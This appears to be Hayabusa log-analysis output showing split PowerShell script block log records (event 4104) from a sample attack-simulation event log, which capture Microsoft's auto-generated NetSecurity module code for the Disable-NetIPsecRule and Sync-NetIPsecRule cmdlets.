$__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, 
$__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecRule' function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] 
[switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAsso",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ciatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] 
[ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, 
$script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) 
$__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') 
-and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_que",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 